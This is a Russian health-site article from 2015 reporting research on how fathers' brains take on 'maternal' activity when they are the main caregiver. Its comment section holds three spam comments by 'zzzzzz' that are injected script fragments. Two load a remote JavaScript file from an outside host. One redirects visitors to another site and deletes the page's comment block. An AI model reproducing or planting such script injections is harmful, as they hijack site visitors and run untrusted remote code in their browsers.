Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Когда папа может стать ма...  >>  Когда папа может стать мамой?
 
Обратная связь
 

Когда папа может стать мамой?

Размер шрифта
05 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Чем больше времени отец проводит со своим ребенком, тем больше вероятность, что в его мозге начнут происходить те процессы, которые в норме свойственны только организму матери, считают ученые.

Когда папа может стать мамой?

У отцов, которые большую часть времени проводят с детьми, повышается активность в тех областях мозга, которые контролируют эмоции, из-за чего они испытывают чувства и переживания, которые обычно испытывает мать. Это случается, когда по какой-то причине именно отец, а не мать, посвящает себя воспитанию ребенка.

Ученые считают, что в головном мозге существует специальная нейронная сеть, которая отвечает за родительское поведение. «Беременность, роды и кормление грудью активируют эту систему у женщин. Благодаря ей молодая мать стремится всеми способами обеспечить безопасность своего ребенка», – объясняет Рут Фелдман, профессор психологии из Йельского Университета, автор исследования. «У отцов также есть подобная стратегия поведения, однако она проявляется только если они ежедневно проводят время с ребенком – в этом случае активируется «материнская» нейронная сеть».

Чтобы определить разницу между активностью мозга у отцов и матерей, Фелдман с коллегами изучили поведение 89 пар, которые впервые стали родителями. В эту группу вошли как гетеро-, так и гомосексуальные пары. Изучение гомосексуальных пар позволило наиболее точно проанализировать то, как родительская роль мужчины влияет на его поведение и мозговую активность. «Такого явления не найти в мире животных, да и среди людей оно появилось совсем недавно – двое отцов, которые воспитывают ребенка», – рассказывает Фелдман. В такой ситуации один из мужчин берет на себя ведущую роль в уходе за ребенком – фактически роль матери.

Исследователи наблюдали за поведением родителей, а также делали снимки их головного мозга, чтобы определить, какие области были наиболее активны. Они обнаружили значительные различия в работе мозга отцов и матерей. У женщин наибольшая активность была обнаружена в областях, отвечающих за эмоции: к примеру, в области миндалины мозга она была в пять раз выше, чем в аналогичной зоне у мужчин. У мужчин наиболее активна оказалась область верхней височной борозды – участка мозга, отвечающего за принятие логических решений.

Однако все вышесказанное не касается тех мужчин, которые фактически берут на себя роль матери в заботе о ребенке. У них повышается активность в обеих зонах мозга как «материнской», так и «отцовской». «Активность в области миндалины головного мозга повышается в зависимости от количества времени, проводимого с ребенком, и может достигать того же уровня, что и у матери», – добавляет Фелдман. Таким образом мозг мужчины словно адаптируется к новой для него родительской роли. Чем в большей степени отец вовлечен в процесс воспитания ребенка, тем сильнее активируется нейронная сеть в его головном мозге. В головном мозге также усиливаются сигналы к выработке окситоцина, который известен как «гормон любви» и, по словам Фелдман, поддерживает хорошие взаимоотношения внутри пары, необходимые для воспитания ребенка. «Уровень окситоцина был примерно одинаков как среди мужчин, так и среди женщин», – добавляет она.

Так что папа, по сути, может «стать мамой» – в случае необходимости его мозг начинает работать по-новому, что дает ему возможность взять на себя главную роль в воспитании ребенка.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Родители стали хуже после падения Берлинской стены!   Магниты убивают детей! Как их защитить?   Родители!!! Мы все ошибались! Ученые доказали, что компьютерные игры стимулируют чтение!   И было у нее три сына: один – умный, второй – глупый, а третий – футболист!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Первые шаги вашего малыша
Как научить ребенка есть правильно. Что можно и нельзя
Можно ли пережить беременность без рвоты?

Тесты

1
Яички – удивительный орган
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.